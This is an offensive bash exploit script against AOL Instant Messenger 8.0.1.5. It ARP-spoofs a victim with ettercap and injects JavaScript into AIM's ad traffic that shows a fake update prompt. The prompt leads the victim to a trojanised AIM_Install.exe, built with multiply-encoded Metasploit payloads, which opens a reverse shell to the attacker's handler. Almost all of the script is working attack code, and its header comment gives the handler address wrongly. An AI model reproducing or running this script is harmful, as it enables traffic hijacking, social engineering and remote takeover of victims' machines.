#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

ATTACKER="192.168.2.10";
VICTIM="192.168.2.5";
GATEWAY="192.168.2.1";
REVPORT="443";
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";

mkdir ~/aimpwn;
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;
### wget section.
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to
### change ATTACKER IP or port.
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;